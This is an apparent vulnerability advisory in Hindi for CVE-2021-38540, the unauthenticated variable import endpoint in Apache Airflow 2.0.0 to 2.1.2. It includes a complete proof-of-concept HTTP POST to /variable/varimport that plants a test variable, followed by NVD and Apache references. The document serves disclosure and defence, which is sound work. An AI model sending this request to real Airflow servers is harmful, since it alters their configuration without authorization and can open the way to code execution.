
महत्वपूर्ण घटक पर प्रमाणीकरण की कमी CVE-2021-38540
महत्वपूर्ण घटक पर अनुपस्थित प्रमाणीकरण जिसे CVE-2021-38540 के नाम से जाना जाता है
Airflow >=2.0.0, <2.1.3 में वेरिएबल इम्पोर्ट एंडपॉइंट प्रमाणीकरण द्वारा सुरक्षित नहीं था। इसने अप्रमाणित उपयोगकर्ताओं को DAGs में उपयोग किए जाने वाले Airflow वेरिएबल्स को जोड़ने/संशोधित करने के लिए उस एंडपॉइंट को हिट करने की अनुमति दी, जिसके परिणामस्वरूप संभावित रूप से सेवा से इनकार, सूचना प्रकटीकरण या रिमोट कोड निष्पादन हो सकता है। यह समस्या Apache Airflow >=2.0.0, <2.1.3 को प्रभावित करती है। [CVE-2021-38540]
इस POC में एक अनुरोध है जो Admin>variables [ List Variables ] के अंतर्गत kafka_captainhook_user नामक एक वेरिएबल बनाएगा।
POST /variable/varimport HTTP/2
Host: airflow.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33976360506209910502051128075
Content-Length: 398
Origin: https://airflow.example.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------33976360506209910502051128075
Content-Disposition: form-data; name="csrf_token"
-----------------------------33976360506209910502051128075
Content-Disposition: form-data; name="file"; filename="variables.json"
Content-Type: application/json
{
"kafka_captainhook_user": "testCaptain"
}
-----------------------------33976360506209910502051128075--
https://nvd.nist.gov/vuln/detail/CVE-2021-38540 https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E